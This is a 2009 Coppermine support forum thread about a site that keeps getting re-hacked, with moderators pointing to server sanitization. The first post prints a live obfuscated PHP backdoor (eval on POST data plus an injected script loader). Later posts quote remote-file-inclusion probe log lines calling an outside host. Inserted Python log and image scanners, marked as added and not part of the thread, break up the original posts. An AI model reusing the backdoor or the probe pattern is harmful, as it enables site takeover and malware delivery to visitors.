forum.coppermine-gallery.net

Support => cpg1.4.x Support => Older/other versions => cpg1.4 miscellaneous => Topic started by: ksxj on March 29, 2009, 09:32:08 am

Title: hacked
Post by: ksxj on March 29, 2009, 09:32:08 am
I have tried checking the databases for unknown admin accounts and don't see anything. 
I tried to delete all files and copy my backup files back over.
I tried reinstalling from scratch.
But about 5min - 30 hrs after I open the directory back up to the public it gets hacked again.

Has anyone else had this problem?
could really use some help!!!!!!!

It messes up my phpbb files, myphpadmin files, and coppermine files.

Code:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdncyUzQ0N4c09KMGNyaXB0JTIwc3JjJTNEZ3MlMkYwd2UlMkZuZzlnczRoVWglMkVoVWgyNDclMkUyalhUJTJFbmcxT0owOTVDeCUyRmhVaGpxT0owdWVyQ3h5Q3glMkVqc25nJTNFJTNDbmclMkZzY3JqWFRpcGhVaHRncyUzRScpLnJlcGxhY2UoL2hVaHxqWFR8Z3N8c1Z8MHdlfEN4fE9KMHxuZy9nLCIiKSk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>


Title: Re: hacked
Post by: Phill Luckhurst on March 29, 2009, 11:45:54 am
A link to your site would help.

Are you using the latest versions of all the software you have installed?

Have you done a full scan of your setup and all the files in there?

Have you read the yikes, I've been hacked thread?

http://forum.coppermine-gallery.net/index.php/topic,51927.0.html
Title: Re: hacked
Post by: ksxj on March 29, 2009, 12:33:34 pm


the site is www.kamojeepclub.org and my personal site www.larsons.info


But I have taken the site down.  Trying to fix it.  But yes I did a fresh install with all of the newest versions.  It took 5 minutes for it to be hacked.  And yes I read that forum.
Title: Re: hacked
Post by: Joachim Müller on March 29, 2009, 01:33:31 pm
Just performing a fresh install won't help. As suggested in the Yikes thread, you need to sanitize your entire site. This includes closing all possible backdoors and loopholes. Usually, attackers don't leave an admin account behind inside the database, as that's quite obvious to figure out and to fix. More elegantly, they hide a little script that lets them take over your site again in a file that looks innocent. They usually hide that file outside of the folder that contains the app that let them get in in the first place. It's quite likely that the backdoor they use doesn't reside in your coppermine folder. Therefore, your fresh installs won't accomplish anything good.
I'm sorry, but this is something you can't really expect our help with: as suggested in the Yikes-thread, you're welcome to try to sanitize for yourself. If this doesn't help, ask your webhost for support. If this doesn't help, hire a pro. It's really beyond the scope of free support to clean your hacked site. It's beyond the scope of this site as well to explain to you what hackers do to infest your site - even if we were ready to post such instructions, wannabe script kiddies would benefit more from such instructions than you as site owner (who usually doesn't have any hacking skills, which is understandable and fine).
I can understand that this might sound frustrating for you, but you have to understand that we simply cannot help you more with this.
In the future, please use better subjects for your postings.
Title: Re: hacked
Post by: ksxj on March 30, 2009, 08:44:53 pm
what do you consider sanitizing my entire site.  I deleted every file and folder and started a fresh install from scratch.  Then double checked that all the permissions on the folders and files were correct.   Just got done doing that for the second time yesterday.  My site was hacked again sometime today.
Title: Re: hacked
Post by: Phill Luckhurst on March 30, 2009, 08:53:38 pm
When you say you sanitised the entire site, do you mean every file including phpbb and myphpadmin? Have you upgraded those to the latest version too? Have you checked through all the files in your album folders for malicious scripts?

The best bet would be to ask your host to check the server logs. They should be able to see where the scumbags got in and what changes they have made.
Title: Re: hacked
Post by: ksxj on March 30, 2009, 09:57:13 pm
on either yahoo or godaddy I don't get the choice of version of phpmyadmin.  Plus they both say it will take a court subpoena to get the access log file.  I have my access logs set up but they are not descriptive enough.  But yes I deleted every html, php file off my server and then reinstalled and double checked permissions on each file.
Title: Re: hacked
Post by: Joachim Müller on March 31, 2009, 08:32:41 am
What do you consider a re-install? Your site looks pretty customized to me - it's not just a vanilla install. At least the forum theme must come from somewhere - from a copy on your hard-drive ideally. Can't say anything about your gallery, as you require visitors to log in. The gallery certainly isn't a fresh install either - as you have indexes on (which is a very bad thing in terms of security) I was able to browse your albums folder (http://www.kamojeepclub.org/gallery/albums/) and spot that there are loads of sub-folders and files. All script kiddies are obviously welcome to browse your page - that's like saying "hackers welcome" at the front door. Did you actually read the Yikes-thread and do as suggested? I don't think so: it looks like you haven't sanitized nor have you re-installed properly - a re-install would mean an empty slate and not a populated gallery and forum. Looks like you re-added the hack by restoring the files or not deleting them in the first place. As suggested in the Yikes-thread: you need to sanitize your site, which is a time-consuming job.
Title: Re: hacked
Post by: ksxj on March 31, 2009, 03:35:07 pm
what do you mean by?
 as you have indexes on (which is a very bad thing in terms of security)


It is a fresh install. I reinstalled all those addins, custom settings and all and uploaded all new img files while it was still up and running.  I stayed up all night to get it done but I did do it.  Now for the albums folder, I didn't realize that.  It was not that way the first time I got hacked though.  Which brings up why I am posting this.  I just want to know how they got in and are continually getting in.  Just getting real frustrated and need some assistance.
Title: Re: hacked
Post by: ksxj on March 31, 2009, 03:41:04 pm
Oh I consider a fresh install to be where I download the most updated version of code from this site and used my ftp program and told it to install.
Title: Re: hacked
Post by: Phill Luckhurst on March 31, 2009, 04:05:42 pm
It is impossible for us to know how they got in. It might have been through coppermine but could be through so many other ways including problems with your hosting. I have seen hosts have an entire server full of users get hacked when they get in through one user which might not be you. You also have other applications on your system that could have allowed the hackers in.

The only way to be sure is to check the logs or ask your host to explain how they got in. If your host is unwilling to do that then maybe you should consider alternative options. By not telling you they are compromising their system so it is in their best interests to help.

Title: Re: hacked
Post by: Joachim Müller on April 01, 2009, 09:17:05 am
Indexes being on is not related to coppermine. Please google for it or ask your webhost.
Title: Re: hacked
Post by: ksxj on April 09, 2009, 08:03:13 pm
so its happened again!!!!!!!!!!!

found these in my log file.  Is this how they are getting in?

"GET /gallery/albums/inc/functions.inc.php?config[ppa_root_path]=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"

"GET /inc/functions.inc.php?config[ppa_root_path]=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"

found some interesting reading on ppa_root_path

http://anonymousite.altervista.org/wordpress/2008/09/01/20/

http://www.securityfocus.com/bid/14209/exploit

http://www.geocities.com/hsia_joe/Tutorial.txt

Can someone please help me???!!!!!
Title: Re: hacked
Post by: ksxj on April 09, 2009, 08:05:44 pm
another site

http://www.vupen.com/english/advisories/2006/3842

Title: Re: hacked
Post by: Nibbler on April 09, 2009, 08:28:26 pm
Those are vulnerabilities in other applications.
Title: Re: hacked
Post by: ksxj on April 09, 2009, 08:30:10 pm
then why are they using it in my site with your software installed???

"GET /gallery/albums/inc/functions.inc.php?config[ppa_root_path]=http://www.shipdesign.co.kr/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"

"GET /inc/functions.inc.php?config[ppa_root_path]=http://www.shipdesign.co.kr/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"


Title: Re: hacked
Post by: Nibbler on April 09, 2009, 08:31:25 pm
It's an automatic attack. You don't have that software installed so it fails. That's what the log message is telling you: 404 - file not found.
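A defender-side way to read such log lines, as an added example that is not code from the thread or from Coppermine: it parses combined-format request lines, flags query values that carry a full URL (the ppa_root_path remote-include probe shown above) and PHP files requested from the albums tree, and uses the status code to separate failed probes (404, as Nibbler explains) from hits that deserve a look. The sample lines are constructed and the remote host in them is a placeholder.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines modelled on the access-log entries quoted in the
# thread; the remote host in the query string is a placeholder, not a real one.
SAMPLE_LOG = [
    '"GET /gallery/albums/inc/functions.inc.php?config[ppa_root_path]=http://attacker.example/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"',
    '"GET /inc/functions.inc.php?config[ppa_root_path]=http://attacker.example/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"',
    '"GET /gallery/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '"GET /gallery/albums/userpics/10001/pic.php?x=1 HTTP/1.1" 200 91 "-" "libwww-perl/5.79"',
]

# Request, status and user-agent fields of a combined-format log line.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
                    r'(?P<status>\d{3}) (?:\d+|-) "[^"]*" "(?P<ua>[^"]*)"')

# Upload directories that should only ever serve images, never PHP.
UPLOAD_DIRS = ("/gallery/albums/", "/albums/")

def classify(line):
    """Describe one log line; returns None if the line does not parse."""
    m = LOG_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    params = parse_qsl(parts.query, keep_blank_values=True)
    # A remote-include probe passes a full URL as a parameter value.
    rfi = any(v.lower().startswith(("http://", "https://", "ftp://")) for _, v in params)
    # A .php file under the albums tree is a script where only images belong.
    script_in_uploads = parts.path.endswith(".php") and parts.path.startswith(UPLOAD_DIRS)
    status = int(m["status"])
    if rfi and status == 404:
        verdict = "failed-probe"   # included target does not exist: scanner noise
    elif rfi or script_in_uploads:
        verdict = "investigate" if status < 400 else "failed-probe"
    else:
        verdict = "normal"
    return {"path": parts.path, "status": status, "rfi": rfi,
            "script_in_uploads": script_in_uploads, "ua": m["ua"], "verdict": verdict}

def summarize(lines):
    """Count verdicts over a batch of lines; unparsable lines are skipped."""
    counts = {}
    for line in lines:
        r = classify(line)
        if r:
            counts[r["verdict"]] = counts.get(r["verdict"], 0) + 1
    return counts
```

Feed it a whole access log with `summarize(open(path))`; the lines worth chasing are the ones that come back as "investigate", not the 404 scanner noise.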
Title: Re: hacked
Post by: ksxj on April 09, 2009, 08:38:06 pm
thanks that makes more sense.


But I still don't understand how they are getting into my site and inserting code! 
Title: Re: hacked
Post by: Nibbler on April 09, 2009, 08:40:41 pm
Make sure your gallery is up to date and fully sanitised.
Title: Re: hacked
Post by: ksxj on April 09, 2009, 09:03:35 pm
I know that is your first response but I have done that multiple times now and it has not fixed the issue.
Title: Re: hacked
Post by: ksxj on April 09, 2009, 09:33:57 pm
Nibbler - would you be willing to ftp into my account and confirm that I sanitized so I can stop getting that question?
Thanks
Title: Re: hacked
Post by: Nibbler on April 09, 2009, 09:40:39 pm
OK. PM me.
Title: Re: hacked
Post by: ksxj on April 09, 2009, 10:05:39 pm
OK. PM me.

just did - thanks
Title: Re: hacked
Post by: ksxj on April 10, 2009, 04:29:49 pm
@ksxj: stop butting in - I have already replied to another thread where you told people to visit your thread (http://forum.coppermine-gallery.net/index.php/topic,58903.msg290476.html#msg290476). To make this clear: you have not understood the concept behind cleaning and sanitizing as suggested in the Yikes thread. You insist that there is something else people need to do, which is not the case.

@thread starter: ignore ksxj. Do as suggested in the Yikes thread (http://forum.coppermine-gallery.net/index.php/topic,51927.0.html).

wow, just trying to help and see if there are others with the same issue. 

I agree that the yikes thread is very helpful and a great start.  I am just using this forum for what it is for.  Joining people with the same interests and to help each other if our paths cross. How are we supposed to know if we are not allowed to discuss such things?

And you say I did not sanitize my site.  Wouldn't deleting all files and reinstalling from scratch count as sanitizing?
Title: Re: hacked
Post by: Joachim Müller on April 11, 2009, 09:41:25 am
If you really delete all files (even the ones outside the path of coppermine) and if you don't forget to clean the database as well, then yes: this would count as extreme sanitization, or rather an extermination. But that's not what you said you did in "your" thread. The things you did or did not perform should however not be discussed in this thread, but inside your thread. In other words: please stay out of this thread with your issues.
Title: Re: hacked
Post by: ksxj on April 11, 2009, 06:21:29 pm
I am really needing help and you want me to stay out of my own thread.  I understand you want me out of other people's threads but my own?


Well it hasn't even been a day since I completely deleted all my files except the .jpg's and reloaded my gallery and forum from scratch.  I didn't even have time to reinstall my gallery theme or any of the mods I have done in the past.  Can someone please help me?!?!?!?!?!?!?!?!?
Title: Re: hacked
Post by: Phill Luckhurst on April 11, 2009, 08:16:43 pm
I think you misunderstood. I believe Joachim wants you to keep out of the other threads and keep your questions to your own.

Did you delete all of your other files such as phpbb etc?
Title: Re: hacked
Post by: Joachim Müller on April 11, 2009, 08:56:41 pm
deleted all my files except the .jpg's
Are you sure the jpeg files are clean?

I believe Joachim wants you to keep out of the other threads and keep your questions to your own.
Exactly. Thanks for the clarification. Sorry if I haven't expressed clearly enough what I meant.
Title: Re: hacked
Post by: ksxj on April 12, 2009, 02:57:32 am
Are you sure the jpeg files are clean?

How do I check that?  They open ok when you go to them.  Is there another way to check?
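One way to check image files the way Joachim's question implies, as an added example that is not from the thread or from Coppermine: it compares each file's leading bytes with what its extension promises, looks for a PHP open tag inside image data, and flags PHP scripts sitting among images. The sample files are constructed in memory; `scan_tree` is a helper name assumed here for running the same check over a real albums folder.

```python
import os
import re

# Leading bytes an image file must start with, keyed by lower-case extension.
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",), ".gif": (b"GIF87a", b"GIF89a"),
}
SCRIPT_EXTS = (".php", ".phtml", ".php3", ".php4", ".php5")
PHP_TAG = re.compile(rb"<\?php\b|<\?=", re.IGNORECASE)

# Constructed in-memory sample files standing in for an albums folder.
SAMPLES = {
    "IMG_001.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,          # plain JPEG header
    "banner.gif": b"GIF89a" + b"\x00" * 8,                      # plain GIF header
    "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 8 + b"<?php /* marker */ ?>",
    "pic.jpg": b"<?php /* marker */ ?>",                        # no image header at all
    "thumb.php": b"<?php /* marker */ ?>",                      # script among images
}

def inspect_file(name, data):
    """Classify one file from its name and bytes; returns (verdict, reason)."""
    ext = os.path.splitext(name)[1].lower()
    if ext in SCRIPT_EXTS:
        return ("script-in-upload-dir", "executable script where only images belong")
    if ext in MAGIC:
        if not data.startswith(MAGIC[ext]):
            return ("bad-magic", "extension says image, leading bytes do not")
        if PHP_TAG.search(data):
            return ("embedded-php", "PHP open tag inside image data")
        return ("ok", "")
    return ("unexpected-type", ext or "(no extension)")

def scan_tree(root):
    """Walk a real directory and return (path, verdict, reason) for non-ok files."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            with open(path, "rb") as fh:
                verdict, reason = inspect_file(fn, fh.read())
            if verdict != "ok":
                findings.append((path, verdict, reason))
    return findings

def scan_samples():
    """Run the same check over the constructed in-memory samples."""
    return {n: inspect_file(n, d)[0] for n, d in SAMPLES.items()}
```

A file flagged embedded-php only does harm if the server can be made to execute it, but it is exactly the kind of file that a re-upload of the old .jpg's carries straight back onto a freshly installed site.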
Title: Re: hacked
Post by: ksxj on April 12, 2009, 02:58:27 am
Did you delete all of your other files such a phpbb etc?


I deleted everything.  Even my myphpadmin console files and reinstalled everything. 
Title: Re: hacked
Post by: Joachim Müller on April 13, 2009, 09:09:23 am
A possible reason for re-infection are entire servers on shared webhosting, where the individual accounts are not shielded properly one against the other. I suggest you talk to your webhost as well. Maybe they can shed some light as well on the attack pattern by reviewing their access logs.
As far as I can see, you haven't posted a link to your gallery so far. Would be a good idea to do so now.
Title: Re: hacked
Post by: ksxj on May 08, 2009, 04:09:18 pm
Ok, so I was hacked again this week.  I have been running two sites.  One was just phpbb3 without coppermine for 3 weeks.  The other just coppermine. One week after I added coppermine it happened and now it has gotten my just coppermine site.  So I know it is coppermine.

But now I think it has a name because my work comes up blocking "gumblar.cn" when I go to my websites.
Title: Re: hacked
Post by: Joachim Müller on May 08, 2009, 04:57:05 pm
Re-infections can happen as well if the webspace hasn't been sanitized properly or if outdated software was used. Since you haven't elaborated, there's no saying if it's really the case that coppermine is to blame. Anyway, with so little detail, it's just crying "thief". Not a bright idea. If you want help, post details. If you just came here to blame others, then please stop it.
Title: Re: hacked
Post by: ksxj on May 08, 2009, 05:32:34 pm
wow, I am posting my findings as I go, so maybe someone else can read this or stumble across it if they are having the same issue.  Isn't this what the forum is for???  I am not mad or upset with anyone on this site or blaming anyone on this site.

It looks like it is not just coppermine but other php based forums/scripts as well.  Looks like they can affect your personal computer and then use your ftp program to find out usernames and passwords for your sites.  But again this is my findings so far, so if you know anything else please share with me and others so we can maybe get a handle on it.



Title: Re: hacked
Post by: Joachim Müller on May 09, 2009, 02:37:40 pm
Well, you blamed coppermine:
So I know it is coppermine. 
and I replied that you can't be sure.
What else do you expect?